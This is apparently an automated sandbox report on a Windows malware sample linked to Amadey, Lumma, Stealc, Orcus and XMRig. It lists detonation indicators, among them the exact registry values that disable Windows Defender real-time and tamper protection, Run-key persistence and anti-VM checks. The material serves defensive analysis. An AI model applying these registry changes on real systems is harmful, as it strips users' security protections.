Malware Analysis Report

2025-01-22 14:58

Sample ID 241206-cywjja1pbk
Target 458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe
SHA256 458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e
Tags
amadey gcleaner lumma orcus stealc 9c9aa5 drum discovery evasion execution loader persistence rat spyware stealer trojan ta505 xmrig miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e

Threat Level: Known bad

The file 458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe was found to be: Known bad.

Malicious Activity Summary

amadey gcleaner lumma orcus stealc 9c9aa5 drum discovery evasion execution loader persistence rat spyware stealer trojan ta505 xmrig miner

Modifies Windows Defender Real-time Protection settings

GCleaner

Suspicious use of NtCreateUserProcessOtherParentProcess

Orcus

Amadey

Lumma Stealer, LummaC

Lumma family

Ta505 family

Stealc family

Amadey family

Xmrig family

Orcus family

xmrig

Stealc

TA505

Gcleaner family

XMRig Miner payload

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Orcurs Rat Executable

Blocklisted process makes network request

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Windows security modification

Checks BIOS information in registry

Checks computer location settings

Identifies Wine through registry keys

Reads user/profile data of web browsers

Loads dropped DLL

Checks installed software on the system

Looks up external IP address via web service

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

AutoIT Executable

Enumerates processes with tasklist

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

System Location Discovery: System Language Discovery

Uses Task Scheduler COM API

Suspicious use of SendNotifyMessage

Suspicious use of AdjustPrivilegeToken

Modifies system certificate store

Checks processor information in registry

Scheduled Task/Job: Scheduled Task

Modifies registry class

Runs net.exe

Kills process with taskkill

Suspicious use of SetWindowsHookEx

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-12-06 02:29

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-12-06 02:29

Reported

2024-12-06 02:32

Platform

win7-20240729-en

Max time kernel

148s

Max time network

149s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Amadey family

amadey

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\1012583001\8785c75487.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\1012583001\8785c75487.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\1012583001\8785c75487.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\1012583001\8785c75487.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\1012583001\8785c75487.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\1012583001\8785c75487.exe N/A

Orcus

rat spyware stealer orcus

Orcus family

orcus

Stealc

stealer stealc

Stealc family

stealc

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 1544 created 1284 N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com C:\Windows\Explorer.EXE

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012579001\d3b8f2d358.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012580001\d902cee6ea.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012581001\7329de9159.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012583001\8785c75487.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A

Orcurs Rat Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012580001\d902cee6ea.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012581001\7329de9159.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012583001\8785c75487.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012579001\d3b8f2d358.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012580001\d902cee6ea.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012579001\d3b8f2d358.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012581001\7329de9159.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012583001\8785c75487.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012579001\d3b8f2d358.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012580001\d902cee6ea.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012581001\7329de9159.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012583001\8785c75487.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-9K4OL.tmp\i1A5m12.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-9K4OL.tmp\i1A5m12.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-9K4OL.tmp\i1A5m12.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-9K4OL.tmp\i1A5m12.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\1012583001\8785c75487.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\1012583001\8785c75487.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\d902cee6ea.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012580001\\d902cee6ea.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\7329de9159.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012581001\\7329de9159.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\a01c94d9d9.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012582001\\a01c94d9d9.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\8785c75487.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012583001\\8785c75487.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\SmartScreen = "C:\\Users\\Admin\\AppData\\Local\\Temp\\smartscreen.exe" C:\Users\Admin\AppData\Local\Temp\smartscreen.exe N/A

Checks installed software on the system

discovery

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\skotes.job C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe N/A
File opened for modification C:\Windows\MovieArchives C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe N/A
File opened for modification C:\Windows\PackageExpression C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\choice.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012580001\d902cee6ea.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012582001\a01c94d9d9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language C:\Users\Admin\AppData\Local\Temp\1012582001\a01c94d9d9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012579001\d3b8f2d358.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage C:\Users\Admin\AppData\Local\Temp\1012582001\a01c94d9d9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-9K4OL.tmp\i1A5m12.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012581001\7329de9159.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012583001\8785c75487.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\find.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\1012580001\d902cee6ea.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\1012580001\d902cee6ea.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\1012580001\d902cee6ea.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe N/A

Runs net.exe

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-9K4OL.tmp\i1A5m12.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-9K4OL.tmp\i1A5m12.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012579001\d3b8f2d358.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012580001\d902cee6ea.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012581001\7329de9159.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\a01c94d9d9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012583001\8785c75487.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\a01c94d9d9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012583001\8785c75487.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012583001\8785c75487.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1012583001\8785c75487.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
